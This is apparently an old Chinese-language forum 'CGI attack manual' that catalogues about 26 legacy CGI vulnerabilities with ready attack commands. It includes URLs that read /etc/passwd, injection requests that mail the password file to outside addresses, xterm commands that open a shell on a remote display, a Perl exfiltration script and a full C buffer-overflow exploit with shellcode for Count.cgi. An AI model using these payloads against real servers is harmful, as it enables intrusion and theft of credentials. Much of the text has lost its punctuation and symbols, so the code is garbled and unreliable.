CGI攻略.doc

前言在论坛里看到过bamboo写的CGI漏洞利用的文章,我就想把他扩大一些.一直想完善一些再贴上来,但我并没有机会和时间试过所有漏洞,想到论坛里还有那么多同志会来完善的,就取名CGI漏洞攻击手册version-0.02(升级了bamboo的),旨在抛砖引玉,欢迎任意修改,增加.更欢迎任意散播.一.phf漏洞 这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd: lynx /cgi-bin/phf?Q.t%20/etc/passwd 但是我们还能找到它吗?二.php.cgi 2.0beta10或更早版本的漏洞可以读nobody权限的所有文件.lynx /cgi-bin/php.cgi?/etc/passwdphp.cgi 2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在/etc/master.passwd/etc/security/passwd等.三.whois_raw.cgilynx /cgi-bin/whois.t%20/etc/passwdlynx /cgi-bin/:0四.faxsurveylynx /cgi-bin/faxsu.t%20/etc/passwd五.textcounter.pl如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令.#!/usr/bin/perl$URL=http:/dtp.kappa.ro/a/test.shtml;# please _DO_ _modify_ this $EMAIL=pdorupop3.kappa.ro,root; # please _DO_ _modify_ thisif ($ARGV0) $CMD=$ARGV0;else$CMD=(ps ax;cd .;cd .;cd .;cd etc;cat hosts;set)|mail $EMAIL -sanothere_one;$text=$URL/;IFS=8;$CMD;echo|;$text = s/ /$IFS/g;#print $textn;system(wget wget, $text, -O/dev/null);system(wget wget, $text, -O/dev/null);#system(lynx lynx, $text); #如果没有wget命令也可以用lynx#system(lynx lynx, $text); 六.一些版本(1.1)的info2www的漏洞$ REQUEST_METHOD=GET ./info2www (./././././././bin/mail jami /etc/passwd|)$You have new mail.$说实在我不太明白.七.pfdispaly.cgilynx -source /cgi-bin/pfdispaly.cgi?/././././etc/motdpfdisplay.cgi还有另外一个漏洞可以执行命令lynx -dump /cgi-bin/pfdispaly.cgi?%0A/bin/uname%20-a|orlynx -dump http:/victim/cgi-bin/pfdispaly.cgi?%0A/usr/bin/X11/xclock%20-display%20evil:0.0|八.wraplynx /cgi-bin/wrap?/./././././etc九.www-sql可以让你读一些受限制的页面如:在你的浏览器里输入:http:/your.server/protected/something.html:被要求输入帐号和口令.而有www-sql就不必了:http:/your.server/cgi-bin/www-sql/.something.html:十.view-sourcelynx /cgi-bin/view-././etc/passwd 十一.campaslynx /cgi-bin/campa.a/etc/passwd%0a十二.webgaistelnet 80POST /cgi-bin/webgais HTTP/1.0Content-length: 85 (replace this with the actual length of the exploitline)query=;mail+drazvanpop3.kappa.ro/etc/passwd;echo&output=subject&domain=paragraph 十三.websendmailtelnet 80POST /cgi-bin/websendmail HTTP/1.0Content-length: xxx (should be replaced with the actual length of thestring passed to the server, in this case xxx=90)receiver=;mail+your_/etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a十四.handlertelnet 80GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=DownloadHTTP/1.0orGET /cgi-bin/handler/blah;|?data=DownloadorGET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/sh|?data=Download注意,cat后是TAB键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命令. 十五.test-cgilynx /cgi-bin/test-cgi?whatever CGI/1.0 test script report:argc is 0. argv is .SERVER_SOFTWARE = NCSA/1.4BSERVER_NAME = GATEWAY_INTERFACE = CGI/1.1SERVER_PROTOCOL = HTTP/1.0SERVER_PORT = 80REQUEST_METHOD = GETHTTP_ACCEPT = text/plain, application/x-html, application/html,text/html, text/x-htmlPATH_INFO =PATH_TRANSLATED =SCRIPT_NAME = /cgi-bin/test-cgiQUERY_STRING = whateverREMOTE_HOST = REMOTE_ADDR = 00REMOTE_USER =AUTH_TYPE =CONTENT_TYPE =CONTENT_LENGTH =得到一些http的目录lynx /cgi-bin/test-.t%20/etc/passwd这招好象并不管用.lynx /cgi-bin/nph-test-cgi?/*还可以这样试GET /cgi-bin/test-cgi?* HTTP/1.0GET /cgi-bin/test-cgi?x *GET /cgi-bin/nph-test-cgi?* HTTP/1.0GET /cgi-bin/nph-test-cgi?x *GET /cgi-bin/test-cgi?x HTTP/1.0 *GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *十六.对于某些BSD的apache可以:lynx /root/etc/passwdlynx /root/etc/passwd 十七.htmlscriptlynx /cgi-bin/htmls././etc/passwd十八.jj.cThe demo cgi program jj.c calls /bin/mail without filtering userinput, so any program based on jj.c could potentially be exploited bysimply adding a followed by a Unix command. It may require apassword, but two known passwords include HTTPdrocks and SDGROCKS. Ifyou can retrieve a copy of the compiled program running strings on itwill probably reveil the password.Do a web search on jj.c to get a copy and study the code yourself ifyou have more questions.十九.Frontpage extensions如果你读/_vti_inf.html你将得到FP extensions的版本和它在服务器上的路径. 还有一些密码文件如:/_vti_pvt/service.pwd/_vti_pvt/users.pwd/_vti_pvt/authors.pwd/_vti_pvt/administrators.pwd二十.F CGI没有碰到过,觉的有些地方不能搞错,所以直接贴英文.John Carltonfound following. He developedan exploitfor thefree web stats services offered at , and supplied thewebmaster with proper code to patch the bug.Start anaccount , andlog in. Click on thearea thatsays CLICKHERE TOEDIT YOURUSER PROFILE & COUNTERINFO This willcall up afile called edit.plwith your user#and password included in it.Save this file to your hard disk andopen itwith notepad. The onlyform ofsecurity inthis is ahiddenattributeontheformelementof your account number.Change this from*input type=hidden name=account value=your#*to*input type=text name=account value=*Save your page and load it into your browser.Their will now be atext input box where the hidden element was before.Simply type a# in and push the click here to update user profile and alltheinformation that appearson your screenhas now beenwritten tothat user profile.But that isnt the worst of it.By using frames (2 frames, one tohold this pageyou just made,and one asa target forthe formsubmission) you could change the password on all of their accountswith a simple JavaScript function.Deep inside the web site authors still have the good old edit.plscript. It takes some time to reach it (unlike the path described)but you can reach it directly at:/cgi-bin/.=&password=二十一.Vulnerability in Glimpse HTTPtelnet 80GET /cgi-bin/aglimpse/80|IFS=5;CMD=5/etc/passwd;eval$CMD;echoHTTP/1.0二十二.Count.cgi该程序只对Count.cgi 24以下版本有效：/*#count.c#*/#include #include #include #include #include #include #include #include #include /* Forwards */unsigned long getsp(int);int usage(char *);void doit(char *,long, char *);/* Constants */char shell=x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90xebx3cx5ex31xc0x89xf1x8dx5ex18x88x46x2cx88x46x30x88x46x39x88x46x4bx8dx56x20x89x16x8dx56x2dx89x56x04x8dx56x31x89x56x08x8dx56x3ax89x56x0cx8dx56x10x89x46x10xb0x0bxcdx80x31xdbx89xd8x40xcdx80xe8xbfxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff/usr/X11R6/bin/xterm0-ut0-display0;char endpad=xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff;int main (int argc, char *argv)char *shellcode = NULL;int cnt,ver,retcount, dispnum,dotquads4,offset;unsigned long sp;char dispname255;char *host;offset = sp = cnt = ver = 0;fprintf(stderr,t%s - Gusn,argv0);if (argc3) usage(argv0);while (cnt = getopt(argc,argv,h:d:v:) != EOF) switch(cnt)case h:host = optarg;break;case d:retcount = sscanf(optarg, %d.%d.%d.%d:%d, &dotquads0,&dotquads1,&dotquads2,&dotquads3, &dispnum);if (retcount != 5) usage(argv0);sprintf(dispname, %03d.%03d.%03d.%03d:%01d, dotquads0, dotquads1, dotquads2,dotquads3, dispnum);shellcode=malloc(strlen(char *)optarg)+strlen(shell)+strlen(endpad);sprintf(shellcode,%s%s%s,shell,dispname,endpad);break;case v:ver = atoi(optarg);break;case o:offset = atoi(optarg);break;default:usage(argv0);break;sp = offset + getsp(ver);(void)doit(host,sp,shellcode);exit(0);unsigned long getsp(int ver) /* Get the stack pointer we should be using. YMMV. If it does not work, try using -o X, where x is between -1500 and 1500 */unsigned long sp=0;if (ver = 15) sp = 0xbfffea50;if (ver = 20) sp = 0xbfffea50;if (ver = 22) sp = 0xbfffeab4;if (ver = 23) sp = 0xbfffee38; /* Dunno about this one */if (sp = 0) fprintf(stderr,I dont have an sp for that version try using the -o option.n);fprintf(stderr,Versions above 24 are patched for this bug.n);exit(1); else return sp;int usage (char *name) fprintf(stderr,tUsage:%s -h host -d -v -o n,name);fprintf(stderr,te.g. %s -h www.foo.bar -d :0 -v 22n,name);exit(1);int openhost (char *host, int port) int sock; struct hostent *he;struct sockaddr_in sa;he = gethostbyname(host);if (he = NULL) perror(Bad hostnamen);exit(-1);memcpy(&sa.sin_addr, he-h_addr, he-h_length);sa.sin_port=htons(port);sa.sin_family=AF_INET;sock=socket(AF_INET,SOCK_STREAM,0);if (sock 0) perror (cannot open socket);exit(-1);bzero(&sa.sin_zero,sizeof (sa.sin_zero);if (connect(sock,(struct sockaddr *)&sa,sizeof sa)0) perror(cannot connect to host);exit(-1);return(sock);void doit (char *host,long sp, char *shellcode) int cnt,sock;char qs7000;int bufsize = 16;char bufbufsize;char chain = user=a;bzero(buf);for(cnt=0;cnt 8;qscnt+2 = (sp & 0x00ff0000) 16;qscnt+3 = (sp & 0xff000000) 24;strcpy(qs,chain);qsstrlen(chain)=0x90;qs4104= sp&0x000000ff;qs4105=(sp&0x0000ff00)8;qs4106=(sp&0x00ff0000)16;qs4107=(sp&0xff000000)24;qs4108= sp&0x000000ff;qs4109=(sp&0x0000ff00)8;qs4110=(sp&0x00ff0000)16;qs4111=(sp&0xff000000)24;qs4112= sp&0x000000ff;qs4113=(sp&0x0000ff00)8;qs4114=(sp&0x00ff0000)16;qs4115=(sp&0xff000000)24;qs4116= sp&0x000000ff;qs4117=(sp&0x0000ff00)8;qs4118=(sp&0x00ff0000)16;qs4119=(sp&0xff000000)24;qs4120= sp&0x000000ff;qs4121=(sp&0x0000ff00)8;qs4122=(sp&0x00ff0000)16;qs4123=(sp&0xff000000)24;qs4124= sp&0x000000ff;qs4125=(sp&0x0000ff00)8;qs4126=(sp&0x00ff0000)16;qs4127=(sp&0xff000000)24;qs4128= sp&0x000000ff;qs4129=(sp&0x0000ff00)8;qs4130=(sp&0x00ff0000)16;qs4131=(sp&0xff000000)24;strcpy(char*)&qs4132,shellcode);sock = openhost(host,80);write(sock,GET /cgi-bin/Count.cgi?,23);write(sock,qs,strlen(qs);write(sock, HTTP/1.0n,10);write(sock,User-Agent: ,12);write(sock,qs,strlen(qs);write(sock,nn,2);sleep(1); /* printf(GET /cgi-bin/Count.cgi?%s HTTP/1.0nUser-Agent: %snn,qs,qs); */*setenv(HTTP_USER_AGENT,qs,1); setenv(QUERY_STRING,qs,1);system(./Count.cgi);*/用Count.cgi看图片/cgi-bin/Co.to_gif/file.gif二十三.finger.cgilynx /cgi-bin/finger?localhost得到主机上登陆的用户名. 二十四.man.sh Robert Moniotfound followung. The May1998 issueof SysAdminMagazinecontainsanarticle,Web-EnabledManPages, whichincludes source code for very nice cgi script named man.sh to feedman pagesto aweb browser. The hypertextlinks toother manpages are an especially attractive feature.Unfortunately, this script is vulnerable to attack. Essentially,anyone who can execute the cgi thru their web browser can runanysystem commands with the user id of the web server and obtaintheoutput from them in a web page.二十五.FormHandler.cgi在表格里加上你的邮箱里就有/etc/passwd二十六.JFS相信大家都看过JFS 侵入 PCWEEK-LINUX 主机的详细过程这篇文章,他利用photoads这个CGI模块攻入主机. 我没有实际攻击过,看文章的理解是这样先lynx /photoads/cgi-bin/edit.cgi?AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=&Name=%0a1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&Phone=11&Subject=la&password=0&CityStPhone=0&Renewed=0创建